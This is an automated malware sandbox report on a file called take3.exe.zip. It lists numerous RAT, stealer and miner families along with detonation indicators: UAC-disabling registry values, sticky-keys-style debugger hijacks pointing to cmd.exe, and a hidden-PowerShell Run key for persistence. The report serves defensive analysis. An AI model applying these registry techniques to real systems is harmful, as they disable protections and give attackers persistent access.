Analysis Overview
SHA256
5f16ff577993765462d5b054e943ed28bf5dbddb869ca48b22e5643c1a32e6c9
Threat Level: Known bad
The file take3.exe.zip was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Metasploit family
xmrig
Amadey family
Quasar family
MetaSploit
Amadey
Asyncrat family
Ammyy Admin
UAC bypass
Detect Xworm Payload
FlawedAmmyy RAT
Xmrig family
AmmyyAdmin payload
Ammyyadmin family
Xworm
Xred family
Xworm family
njRAT/Bladabindi
Njrat family
Flawedammyy family
Xred
Lumma family
AsyncRat
Lumma Stealer, LummaC
Quasar RAT
XMRig Miner payload
Async RAT payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Enumerates VirtualBox registry keys
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Blocklisted process makes network request
Download via BitsAdmin
Sets file to hidden
Event Triggered Execution: Image File Execution Options Injection
Modifies Windows Firewall
Downloads MZ/PE file
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Drops startup file
VMProtect packed file
Checks BIOS information in registry
Loads dropped DLL
Reads user/profile data of web browsers
Identifies Wine through registry keys
Event Triggered Execution: Component Object Model Hijacking
Checks computer location settings
Reads data files stored by FTP clients
Modifies file permissions
.NET Reactor protector
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
UPX packed file
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Access Token Manipulation: Create Process with Token
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Internet Connection Discovery
Event Triggered Execution: Accessibility Features
Command and Scripting Interpreter: JavaScript
Detects Pyinstaller
NSIS installer
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Kills process with taskkill
Views/modifies file attributes
GoLang User-Agent
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Gathers network information
Enumerates system info in registry
Runs net.exe
Uses Task Scheduler COM API
Delays execution with timeout.exe
Checks processor information in registry
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Opens file in notepad (likely ransom note)
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-28 19:56
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-28 19:56
Reported
2024-11-28 19:58
Platform
win7-20240729-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2328 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
| PID 2328 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
| PID 2328 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI23282\python311.dll
| MD5 | 9a24c8c35e4ac4b1597124c1dcbebe0f |
| SHA1 | f59782a4923a30118b97e01a7f8db69b92d8382a |
| SHA256 | a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7 |
| SHA512 | 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-28 19:56
Reported
2024-11-28 19:58
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Ammyy Admin
AmmyyAdmin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Ammyyadmin family
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
FlawedAmmyy RAT
Flawedammyy family
Lumma Stealer, LummaC
Lumma family
MetaSploit
Metasploit family
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
Xmrig family
Xred
Xred family
Xworm
Xworm family
njRAT/Bladabindi
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates VirtualBox registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\boot.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\langla.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe | C:\Users\Admin\Downloads\UrlHausFiles\22.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\translucently.vbs | C:\Users\Admin\AppData\Local\palladiums\translucently.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe | C:\Users\Admin\Downloads\UrlHausFiles\22.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\Downloads\\UrlHausFiles\\nbea1t8.exe'\"" | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2916 set thread context of 4928 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe | C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleCrashHandler64.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_fr.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ja.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ar.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_th.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psuser.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_bn.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_et.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_vi.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fil.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_it.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_es-419.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bg.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fr.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_te.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bn.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ml.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psuser_64.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_en.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_en-GB.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ur.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateSetup.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psmachine_64.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateSetup.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateOnDemand.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_it.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_tr.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_zh-TW.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateBroker.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psuser.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_kn.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_id.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_lv.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psmachine_64.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_is.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_no.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ru.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psmachine.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_hu.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ms.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_hi.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_pl.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_mr.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Temp\GUT656E.tmp | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleCrashHandler.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateBroker.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_am.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_mr.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ta.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_tr.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_pt-BR.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_uk.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_da.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
